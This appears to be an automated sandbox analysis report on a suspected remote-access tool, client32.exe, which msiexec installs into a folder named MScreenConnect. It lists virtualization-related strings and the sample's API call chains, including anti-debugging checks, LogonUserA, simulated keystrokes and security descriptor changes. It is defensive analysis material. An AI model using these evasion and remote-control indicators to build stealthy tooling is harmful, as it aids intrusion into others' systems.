Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SOther VMWare Cloud Director organizations;SaveOtherOrgConfigurationSpec-repositoryFriendlyName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachineId
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director vApp Network info ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: isVMwareVcSpecified
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: QMicrosoft:Hyper-V:Emulated Ethernet Port
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KMicrosoft:Hyper-V:Ethernet Connection
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Lun1vmwarevmcrypt@ENCRYPTION-spm@DATASTOREIOCONTROL
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to unserial VMware Cloud Director vApp restore spec: [{0}];Unable to find XML node '{0}'
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_InstalledVmTools
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SuffixOrigin;GroupType_VirtualMachine_TextAVirtualMachineConfiguration_Text
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UseOrgSettings VirtualMachineId
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachineId>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: MMicrosoft:Hyper-V:Synthetic Disk Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: ExportingVirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director NAT rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_IsVMwareVcSpecified
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IsAllAvailable$AvailableBusNumber:TargetVirtualMachineDiskInfos,IsQuickRollbackEnabled
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: EVMwareToolsServiceState
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVmwareViewParameters
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize array of VMware Cloud Director vApp network services changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to deserialize array of VMware Cloud Director vApp network mapping from string: '{0}'.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: XML_ATTR_IS_VMWAREVC_SPECIFIED
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: GeneralErrorMsg8CommonOibAntivirusExistState*OibVirtualMachineName"ExceptionErrorMsg
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Invalid number of VMs for VMware Cloud Director vApp restore session
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: ]Microsoft:Hyper-V:Synthetic Display Controller
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KastenVmWareKubernetes
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_SurebackupVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: nicInfoMCannot parse vSphere PCI slot number: #COibAuxDataVmware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachineSize
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SMB3 cluster9VMware Cloud Director server
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: groupInfokFailed to de-serialize Hyper-V auxiliary data: '{0}'.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UserInfoLapplication/vnd.vmware.admin.group+xml
Source: HTCTL32.DLL.1.dr	Binary or memory string: VMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Hyper-V
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: wExtracted disk name from special field for VMware backup: '
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVmWareStorageSystemRoleStatisticModel
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VmWareHosts>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UseCtk4FastProvisionVmStorageInfo,IsFastProvisionEnabled<GetVirtualMachineDiskInfosSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SubjectKapplication/vnd.vmware.admin.user+xmlgFailed to de-serialize VCD access settings ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize array of VMware Cloud Director firewall rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VMToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: EVmWare
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VmwareTargetSetting
Source: client32.exe, 00000003.00000002.4452613329.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.4452754375.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Template"Datastore Cluster*VMware Cloud Director Organization VDC
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UseOrgSettings!VirtualMachineIdsFailed to serialize VCD guest customization info ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VmWareECan't get vendor by platform '{0}'
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director vApp Network info ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to check whether XML can deserialize safe to get VMware IR config: [
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Hyper-V
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachineSize
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: TargetService/CDbCloudCredentialsInfoUMicrosoft:Hyper-V:Synthetic Diskette Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director vApp Network Configuration ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: FilesCollectionFilecThere is no aux. data for Hyper-V replica target.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize array of VMware Cloud Director NAT rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director vApp network services changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMwareOverrideApiVersion
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VmToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director vApp network configuration ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VMwareToolsInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: vSphere=Enable VMware Tools quiescence?Use changed block tracking data]Enable CBT for all protected VMs automaticallyeReset CBT on each Active Full backup automatically
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: iHyper-V Integration cached credentials have updated.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director vApp network mapping ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Commit Failback9Switch Replica To Production+User Interface Launch!Volume Discovery%Hyper-V CBT Rescan
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: BackupMode$SnapReplicaAuxData"COibAuxDataVmware&VeeamReplicaSummary
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachines
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KMicrosoft:Hyper-V:Synthetic DVD Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_BackupVMwareCloud
Source: TCCTL32.DLL.1.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VmWareHosts
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KMicrosoft:Hyper-V:Physical Disk Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: GMicrosoft:Hyper-V:Physical CD Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IsVMwareVc'IsVMwareVcSpecified
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_IsVMwareQuiescenceEnabled
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: EOldVmWare
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_BackupCopyVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VirtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UseCtk5FastProvisionVmStorageInfo-IsFastProvisionEnabled=GetVirtualMachineDiskInfosSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to deserialize array of VMware Cloud Director vApp network ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to deserialize VMware Cloud Director datastore restore info ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VmToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <IsVMwareVc>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director vApp network mapping.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: MigratingVirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachineConfiguration>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Cluster resource names were not found in cluster resource content.7VirtualMachineConfiguration
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_SrcHostVmNetworks
Source: TCCTL32.DLL.1.dr	Binary or memory string: VMWare
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: isVMwareVc
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMwareToolsInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KMicrosoft:Hyper-V:Virtual CD/DVD Disk
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize array of VMware Cloud Director vApp network mapping ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_TgtHostVmNetworks
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director vApp network services changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: _srcHostVmNetworks
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VirtualMachines
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <BackupCopyVMware>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVmwareConnectionInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SMicrosoft:Hyper-V:Synthetic Ethernet Port
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: GMicrosoft:Hyper-V:Virtual Hard Disk
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VmWareRole
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director vApp network mapping ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: hyper-v
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: uiSessionIdaInvalid content of the XML for VMware IR config.aFailed to deserialize VMware IR specification ("
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VMwareToolsInfo>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: EMicrosoft:Hyper-V:Virtual DVD Disk
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IMicrosoft:Hyper-V:Physical DVD Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMware Cluster#VMware Datacenter!Protection group
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVcdVmNetworkingRestoreSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VmwareTargetSettingTag
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VM group[Unexpected type of the Hyper-V object: '{0}'.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: XML_ATTR_VMTOOLSQUIESCE
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CTargetVirtualMachineInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_IsVMwareQuiescenceEnabled
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMware CDPI18B661C1-D9DC-4233-90A0-7E7B10DC2D09
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Vmware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_BackupCopyVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CEpVMwareToolsInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_IsVMwareVc
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_InstalledVmTools
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachineConfiguration
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VMToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize array of VMware Cloud Director vApp Network Configuration ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VirtualMachineId
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: vmwareTargetSetting
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to deserialize array of VMware Cloud Director storage profiles ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VmToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <IsVMwareVcSpecified>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director firewall rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UniqueDigestRef,CreatedBySeedingForCdp0vmwarevmcrypt@ENCRYPTION,spm@DATASTOREIOCONTROL
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: 7Microsoft:Hyper-V:ISO Image
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VmWareRegularReplicaVMsCount>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director vApp network mapping ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director NAT rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_OibVirtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Incompatible VMware API version for {0} {2}: {1} or later is required.2Host {0} is disconnected.0Host {0} is unavailable.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachine>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachineSize>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Archive Sync%Offload to Archive-Backup Synchronization?External Repository Maintenance-Hyper-V Staged Restore
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: TargetVirtualMachineDiskInfosNodeName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IMicrosoft:Hyper-V:Synthetic CD Drive
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: DefaultVirtualMachineConfiguration
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director datastore restore info
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Linux host1Microsoft Windows server%VMware ESXi server1Microsoft Hyper-V server
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_ReplicaVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_ReplicaVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_SurebackupVMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <IsVMwareQuiescenceEnabled>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CGoogleVmNetworkSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director vApp network services changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: GetVirtualMachineInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: vCenter server {0} is not registered in the VMware Cloud Director server {1}.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CreateVmWareRec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Permission: =VirtualMachine.Interact.Backup
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: digestsFolder{Failed to de-serialize aux. data for Hyper-V replica ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VmWareRole>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CGetVirtualMachineDiskInfosSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VirtualMachines
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Template#Datastore Cluster+VMware Cloud Director!Organization VDC
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMware
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: WaitingForGuestJapplication/vnd.vmware.admin.user+xml
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CVirtualMachineBackupRestorePointDbInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize VMware Cloud Director vApp RestAPI restore spec.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CurrentMaxSupportedVmWareVersion
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UUnknown type of the Hyper-V object: '{0}'.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VmwareTargetSettingsSpec
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KastenVmWareKubernetesId
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <SurebackupVMware>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: EncryptedHost#VMware ESX server+VMware vCenter server
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VMwareToolsInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_SrcHostVmNetworks
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_OibVirtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: m_vmToolsQuiesce
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CTargetVirtualMachineDiskInfos
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VmwareTargetSetting>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: UpdateVirtualMachineDiskInfosByTargetMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_TgtHostVmNetworks
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VmToolsQuiesce,FullBackupScheduleKind
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: XML_ATTR_IS_VMWAREVC
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to deserialize array of VMware Cloud Director datastore restore info ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: )WarningNoVmWareToolsWNo VMware Tools installed (per backup info)I3ee483dd-1bef-4209-b706-2e1b981ea0f0
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: VMware backup
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <ReplicaVMware>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: FailedOibsState9CommonOibAntivirusExistState+OibVirtualMachineName#ExceptionErrorMsg1hostAndVmDiskMappingInfo#targetVmDiskInfos
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: 1Microsoft:Hyper-V:Memory
Source: client32.exe, 00000003.00000002.4452754375.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.2336112737.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW/
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: ]Microsoft:Hyper-V:Persistent Memory Controller
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: vmwarevmc.com
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_BackupVMwareCloud
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachines>k__BackingField
Source: client32.exe, 00000006.00000003.2133020457.00000000011D1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000008.00000003.2213937206.0000000000D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: GetVirtualMachineDiskInfosSpecNodeName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: WarningNoVmWareTools
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachines
Source: HTCTL32.DLL.1.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VmWareRegularReplicaVMsCount
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CSbSessionVmNetworkInfo
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: OibVirtualMachineNameNodeName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: 3Microsoft Hyper-V cluster
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <BackupVMwareCloud>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachineTag
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_IsVMwareVcSpecified
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director storage profiles
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VmToolsQuiesce>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: KMicrosoft:Hyper-V:Virtual Floppy Disk
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <OibVirtualMachineName>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: CChangeTargetVirtualMachineDiskInfo

Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node	graph_3-76929
Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node	graph_3-72715
Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\MScreenConnect\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_1115C769

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110AE550 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,

3_2_110AE550

Source: C:\ProgramData\MScreenConnect\client32.exe

3_2_11081000

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110851E0 SetHandleInformation,GetUserObjectSecurity,GetUserObjectSecurity,HeapAlloc,GetProcessHeap,HeapAlloc,GetUserObjectSecurity,GetUserObjectSecurity,GetProcessHeap,HeapAlloc,GetUserObjectSecurity,GetSecurityDescriptorDacl,GetSecurityDescriptorDacl,GetSecurityDescriptorDacl,InitializeSecurityDescriptor,InitializeSecurityDescriptor,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorDacl,SetSecurityDescriptorDacl,SetUserObjectSecurity,SetUserObjectSecurity,SetUserObjectSecurity,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_110851E0

Source: C:\Windows\System32\msiexec.exe

Process created: C:\ProgramData\MScreenConnect\client32.exe "C:\ProgramData\MScreenConnect\client32.exe"

Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,	3_2_1102F520
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	3_2_1108C020
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1115C769
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_11150781
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_1102F520
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_1108C020
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1115C769
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_11150781

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe		3_2_1102E710
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe		6_2_1102E710

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110E9400 GetTickCount,LogonUserA,GetTickCount,GetLastError,

3_2_110E9400

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_111058F0 GetKeyState,DeviceIoControl,keybd_event,

3_2_111058F0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_110964D0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

3_2_110964D0

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_11096C50 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

3_2_11096C50

